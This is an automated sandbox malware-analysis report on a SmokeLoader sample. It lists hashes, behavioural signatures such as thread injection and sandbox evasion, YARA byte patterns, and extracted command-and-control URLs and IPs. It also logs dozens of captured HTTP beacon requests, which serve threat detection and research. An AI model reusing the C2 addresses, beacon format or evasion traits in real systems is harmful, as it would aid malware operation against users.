Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
k8JAXb3Lhs.exe

Overview

General Information

Sample name:k8JAXb3Lhs.exe
renamed because original name is a hash value
Original sample name:eead7a529f768cd0a74a639ff806357c.exe
Analysis ID:1523398
MD5:eead7a529f768cd0a74a639ff806357c
SHA1:5fea9c1f649f81dfca7f19af1cabc8aab2b01829
SHA256:2c84b412d0ab9a058d88e5b34e0921c06da1ba11703ef71c124050406dad1844
Tags:exeStealcuser-abuse_ch
Infos:

Detection

SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected SmokeLoader
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Creates a thread in another existing process (thread injection)
Deletes itself after installation
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to read the PEB
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sigma detected: Execution of Suspicious File Type Extension
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • k8JAXb3Lhs.exe (PID: 6644 cmdline: "C:\Users\user\Desktop\k8JAXb3Lhs.exe" MD5: EEAD7A529F768CD0A74A639FF806357C)
    • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
  • sfjujsr (PID: 2128 cmdline: C:\Users\user\AppData\Roaming\sfjujsr MD5: EEAD7A529F768CD0A74A639FF806357C)
  • sfjujsr (PID: 3452 cmdline: C:\Users\user\AppData\Roaming\sfjujsr MD5: EEAD7A529F768CD0A74A639FF806357C)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
SmokeLoaderThe SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader
{"Version": 2022, "C2 list": ["http://nwgrus.ru/tmp/index.php", "http://tech-servers.in.net/tmp/index.php", "http://unicea.ws/tmp/index.php"]}
SourceRuleDescriptionAuthorStrings
00000000.00000002.1729177326.0000000002631000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
    00000000.00000002.1729177326.0000000002631000.00000004.10000000.00040000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
    • 0x214:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
    00000000.00000002.1729366012.000000000285D000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
    • 0x12709:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
    00000000.00000002.1729108326.00000000025F0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
    • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
    00000004.00000002.1973355708.00000000043B1000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
      Click to see the 7 entries

      System Summary

      barindex
      Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\sfjujsr, CommandLine: C:\Users\user\AppData\Roaming\sfjujsr, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\sfjujsr, NewProcessName: C:\Users\user\AppData\Roaming\sfjujsr, OriginalFileName: C:\Users\user\AppData\Roaming\sfjujsr, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\user\AppData\Roaming\sfjujsr, ProcessId: 2128, ProcessName: sfjujsr
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-10-01T15:17:23.620395+020020391031A Network Trojan was detected192.168.2.44973678.89.199.21680TCP
      2024-10-01T15:17:24.752008+020020391031A Network Trojan was detected192.168.2.44973778.89.199.21680TCP
      2024-10-01T15:17:25.914811+020020391031A Network Trojan was detected192.168.2.44973878.89.199.21680TCP
      2024-10-01T15:17:27.029533+020020391031A Network Trojan was detected192.168.2.44973978.89.199.21680TCP
      2024-10-01T15:17:28.206437+020020391031A Network Trojan was detected192.168.2.44974078.89.199.21680TCP
      2024-10-01T15:17:29.341890+020020391031A Network Trojan was detected192.168.2.44974178.89.199.21680TCP
      2024-10-01T15:17:30.500449+020020391031A Network Trojan was detected192.168.2.44974278.89.199.21680TCP
      2024-10-01T15:17:31.641582+020020391031A Network Trojan was detected192.168.2.44974378.89.199.21680TCP
      2024-10-01T15:17:33.261390+020020391031A Network Trojan was detected192.168.2.44974478.89.199.21680TCP
      2024-10-01T15:17:34.418617+020020391031A Network Trojan was detected192.168.2.44974578.89.199.21680TCP
      2024-10-01T15:17:35.545596+020020391031A Network Trojan was detected192.168.2.44974678.89.199.21680TCP
      2024-10-01T15:17:36.688527+020020391031A Network Trojan was detected192.168.2.44974778.89.199.21680TCP
      2024-10-01T15:17:37.858454+020020391031A Network Trojan was detected192.168.2.44974878.89.199.21680TCP
      2024-10-01T15:17:38.979866+020020391031A Network Trojan was detected192.168.2.44974978.89.199.21680TCP
      2024-10-01T15:17:40.096823+020020391031A Network Trojan was detected192.168.2.44975078.89.199.21680TCP
      2024-10-01T15:17:41.358376+020020391031A Network Trojan was detected192.168.2.44975178.89.199.21680TCP
      2024-10-01T15:17:42.684467+020020391031A Network Trojan was detected192.168.2.44975278.89.199.21680TCP
      2024-10-01T15:17:43.812303+020020391031A Network Trojan was detected192.168.2.44975378.89.199.21680TCP
      2024-10-01T15:17:45.121736+020020391031A Network Trojan was detected192.168.2.44975478.89.199.21680TCP
      2024-10-01T15:17:46.345239+020020391031A Network Trojan was detected192.168.2.44975578.89.199.21680TCP
      2024-10-01T15:17:47.480934+020020391031A Network Trojan was detected192.168.2.44975678.89.199.21680TCP
      2024-10-01T15:17:48.777574+020020391031A Network Trojan was detected192.168.2.44975778.89.199.21680TCP
      2024-10-01T15:17:49.901493+020020391031A Network Trojan was detected192.168.2.44975878.89.199.21680TCP
      2024-10-01T15:17:50.981956+020020391031A Network Trojan was detected192.168.2.44975978.89.199.21680TCP
      2024-10-01T15:17:52.350953+020020391031A Network Trojan was detected192.168.2.44976078.89.199.21680TCP
      2024-10-01T15:17:53.596376+020020391031A Network Trojan was detected192.168.2.44976178.89.199.21680TCP
      2024-10-01T15:18:59.724566+020020391031A Network Trojan was detected192.168.2.44976378.89.199.21680TCP
      2024-10-01T15:19:06.035186+020020391031A Network Trojan was detected192.168.2.44976478.89.199.21680TCP
      2024-10-01T15:19:11.806618+020020391031A Network Trojan was detected192.168.2.44976578.89.199.21680TCP
      2024-10-01T15:19:18.036708+020020391031A Network Trojan was detected192.168.2.44976678.89.199.21680TCP
      2024-10-01T15:19:23.665761+020020391031A Network Trojan was detected192.168.2.44976778.89.199.21680TCP
      2024-10-01T15:19:30.039822+020020391031A Network Trojan was detected192.168.2.44976878.89.199.21680TCP
      2024-10-01T15:19:35.601803+020020391031A Network Trojan was detected192.168.2.44976978.89.199.21680TCP
      2024-10-01T15:19:42.320909+020020391031A Network Trojan was detected192.168.2.44977078.89.199.21680TCP
      2024-10-01T15:19:47.791066+020020391031A Network Trojan was detected192.168.2.44977178.89.199.21680TCP
      2024-10-01T15:19:56.389866+020020391031A Network Trojan was detected192.168.2.449772187.131.253.16980TCP
      2024-10-01T15:20:02.025493+020020391031A Network Trojan was detected192.168.2.449773187.131.253.16980TCP
      2024-10-01T15:20:07.324998+020020391031A Network Trojan was detected192.168.2.449774187.131.253.16980TCP
      2024-10-01T15:20:13.530972+020020391031A Network Trojan was detected192.168.2.449775187.131.253.16980TCP
      2024-10-01T15:20:19.524009+020020391031A Network Trojan was detected192.168.2.449776187.131.253.16980TCP
      2024-10-01T15:20:25.648095+020020391031A Network Trojan was detected192.168.2.449777187.131.253.16980TCP
      2024-10-01T15:20:31.521429+020020391031A Network Trojan was detected192.168.2.449778187.131.253.16980TCP
      2024-10-01T15:20:36.199335+020020391031A Network Trojan was detected192.168.2.449779187.131.253.16980TCP
      2024-10-01T15:20:41.110917+020020391031A Network Trojan was detected192.168.2.449780187.131.253.16980TCP
      2024-10-01T15:20:47.770977+020020391031A Network Trojan was detected192.168.2.449781187.131.253.16980TCP
      2024-10-01T15:20:54.025223+020020391031A Network Trojan was detected192.168.2.449782187.131.253.16980TCP
      2024-10-01T15:20:59.510649+020020391031A Network Trojan was detected192.168.2.449783187.131.253.16980TCP

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: k8JAXb3Lhs.exeAvira: detected
      Source: C:\Users\user\AppData\Roaming\sfjujsrAvira: detection malicious, Label: HEUR/AGEN.1310247
      Source: 00000000.00000002.1729125452.0000000002600000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://nwgrus.ru/tmp/index.php", "http://tech-servers.in.net/tmp/index.php", "http://unicea.ws/tmp/index.php"]}
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
      Source: C:\Users\user\AppData\Roaming\sfjujsrJoe Sandbox ML: detected
      Source: k8JAXb3Lhs.exeJoe Sandbox ML: detected
      Source: k8JAXb3Lhs.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: C:\Users\user\Desktop\k8JAXb3Lhs.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

      Networking

      barindex
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49763 -> 78.89.199.216:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49750 -> 78.89.199.216:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49752 -> 78.89.199.216:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49773 -> 187.131.253.169:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49748 -> 78.89.199.216:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49738 -> 78.89.199.216:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49769 -> 78.89.199.216:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49739 -> 78.89.199.216:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49778 -> 187.131.253.169:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49756 -> 78.89.199.216:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49759 -> 78.89.199.216:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49742 -> 78.89.199.216:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49781 -> 187.131.253.169:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49736 -> 78.89.199.216:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49754 -> 78.89.199.216:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49743 -> 78.89.199.216:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49775 -> 187.131.253.169:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49757 -> 78.89.199.216:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49737 -> 78.89.199.216:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49776 -> 187.131.253.169:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49783 -> 187.131.253.169:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49745 -> 78.89.199.216:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49746 -> 78.89.199.216:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49767 -> 78.89.199.216:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49770 -> 78.89.199.216:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49744 -> 78.89.199.216:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49753 -> 78.89.199.216:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49782 -> 187.131.253.169:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49766 -> 78.89.199.216:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49740 -> 78.89.199.216:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49747 -> 78.89.199.216:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49749 -> 78.89.199.216:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49741 -> 78.89.199.216:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49764 -> 78.89.199.216:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49777 -> 187.131.253.169:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49772 -> 187.131.253.169:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49774 -> 187.131.253.169:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49758 -> 78.89.199.216:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49779 -> 187.131.253.169:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49760 -> 78.89.199.216:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49780 -> 187.131.253.169:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49755 -> 78.89.199.216:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49761 -> 78.89.199.216:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49771 -> 78.89.199.216:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49765 -> 78.89.199.216:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49751 -> 78.89.199.216:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49768 -> 78.89.199.216:80
      Source: C:\Windows\explorer.exeNetwork Connect: 187.131.253.169 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 78.89.199.216 80Jump to behavior
      Source: Malware configuration extractorURLs: http://nwgrus.ru/tmp/index.php
      Source: Malware configuration extractorURLs: http://tech-servers.in.net/tmp/index.php
      Source: Malware configuration extractorURLs: http://unicea.ws/tmp/index.php
      Source: Joe Sandbox ViewIP Address: 78.89.199.216 78.89.199.216
      Source: Joe Sandbox ViewASN Name: UninetSAdeCVMX UninetSAdeCVMX
      Source: Joe Sandbox ViewASN Name: WATANIYATELECOM-ASKW WATANIYATELECOM-ASKW
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bhqjnnqelycixny.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 216Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://puyhtqcmdpxpluct.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 345Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wcdxuymrcevjnpq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 348Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://furydiibsxgmyj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 150Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://riurefweuxr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 148Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yduxerbrsufspya.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 277Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ysuvstjxegoleu.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 170Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ppentvmtanft.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 126Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://iyujkbbljdajhtr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 326Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://awdlidomwbvuuhth.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 196Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nrwpjmrfkgs.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 205Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ikextycmggavxa.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 205Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xflbmtqhirja.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 168Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pyqfoqocstl.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 149Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dijxohecsahmqya.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 319Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fkwktqlntyvhlhv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 271Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://axuolhuhwntg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 261Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://obobrllwrvxobu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 323Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://flkhebcbosbhs.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 127Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sdipfhxrqta.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 147Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ecqgmfmehrdfesh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 276Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cmyvyfvgexcutc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 362Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gahrsvlvghgft.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 336Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dikpavspdxtej.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 171Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://arbcgjbfbud.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 237Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dhkilweanmi.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 318Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rvuyclbvwkrg.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 240Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jqtjcxypgpwnw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 126Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bcgwrufdvmvybh.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 200Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://whtwvxqhovvmi.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 349Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dyfmjstgfwohx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 287Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kwsghrqhqvcg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 151Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ccplyqsjscjfnfid.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 139Host: nwgrus.ru
